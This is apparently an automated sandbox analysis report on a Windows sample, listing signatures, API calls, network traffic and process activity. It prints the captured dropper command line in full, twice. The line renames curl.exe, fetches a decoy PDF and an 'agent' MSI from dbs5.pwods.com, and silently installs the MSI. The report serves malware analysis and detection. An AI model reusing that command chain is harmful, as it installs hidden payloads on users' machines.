Windows Analysis Report

Overview

General Information

Analysis ID: 1528038

Detection

Score: 8
Range: 0 - 100
Whitelisted: false
Confidence: 60%

Signatures

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00103EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free, 3_2_00103EA4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010F820 CryptAcquireContextA,CryptCreateHash, 3_2_0010F820
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx, 3_2_0010F02B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 3_2_0010F860
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 3_2_0010EC10
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00106400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 3_2_00106400
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00106591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 3_2_00106591
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext, 3_2_0010C6E0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010C730 CryptHashData, 3_2_0010C730
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 3_2_0010C750
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: -----BEGIN PUBLIC KEY----- 3_2_000E77F7
Source: TNheBOJElq.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: unknown HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000DDB77 recv,WSAGetLastError, 3_2_000DDB77
Source: global traffic HTTP traffic detected: GET /download/pdf HTTP/1.1 Host: dbs5.pwods.com User-Agent: curl/7.83.1 Accept: */*
Source: global traffic HTTP traffic detected: GET /download/agent HTTP/1.1 Host: dbs5.pwods.com User-Agent: curl/7.83.1 Accept: */*
Source: TNheBOJElq.exe String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe.0.dr String found in binary or memory: Usage: curl [options...] <url>
Source: global traffic DNS traffic detected: DNS query: dbs5.pwods.com
Source: TNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/P
Source: TNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/hsts.html
Source: TNheBOJElq.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: TNheBOJElq.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: TNheBOJElq.exe String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: TNheBOJElq.exe, 00000004.00000002.2071871975.0000000002D70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dbs5.pwods.com/download/agent
Source: TNheBOJElq.exe, 00000003.00000002.2055325705.0000000002A58000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000003.2053825085.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000003.2053256528.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000002.2055431756.0000000002A85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dbs5.pwods.com/download/pdf
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000D1535 3_2_000D1535
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000FA8D8 3_2_000FA8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000CE127 3_2_000CE127
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000DA9B3 3_2_000DA9B3
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000EC1FD 3_2_000EC1FD
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010CAA0 3_2_0010CAA0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000DFAEC 3_2_000DFAEC
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_001133B0 3_2_001133B0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000D4415 3_2_000D4415
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000E25B8 3_2_000E25B8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 000DD6AD appears 302 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 000C913E appears 64 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 000D201D appears 39 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 000D20E6 appears 46 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 000DD632 appears 246 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 000D2564 appears 48 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 000D251E appears 48 times
Source: classification engine Classification label: clean8.win@11/3@1/2
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000C310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next, 3_2_000C310D
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: TNheBOJElq.exe String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: TNheBOJElq.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exe String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: secur32.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: schannel.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000DD33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free, 3_2_000DD33A
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000DCEEF push edi; retn 000Dh 3_2_000DCEF0
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe API coverage: 8.3 %
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: TNheBOJElq.exe, 00000004.00000003.2071234434.0000000002F60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: TNheBOJElq.exe, 00000003.00000003.2053382620.0000000002A60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll||
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0011155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0011155B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00110CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00110CB4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_001116BE SetUnhandledExceptionFilter, 3_2_001116BE
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ""c:\windows\system32\cmd.exe" /c cd /d "c:\users\gloza\appdata\local\temp\" & copy c:\windows\system32\curl.exe tnhebojelq.exe & tnhebojelq.exe -o "c:\users\gloza\documents\qmqjabdqio.pdf" https://dbs5.pwods.com/download/pdf & "c:\users\gloza\documents\qmqjabdqio.pdf" & tnhebojelq.exe -o blhlldebqq.msi https://dbs5.pwods.com/download/agent & c:\windows\system32\msiexec.exe /i blhlldebqq.msi /qn"
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0011137A cpuid 3_2_0011137A
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00111775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_00111775
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 3_2_0010699F
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000FA8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free, 3_2_000FA8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000F8490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError, 3_2_000F8490
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000DDEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 3_2_000DDEDF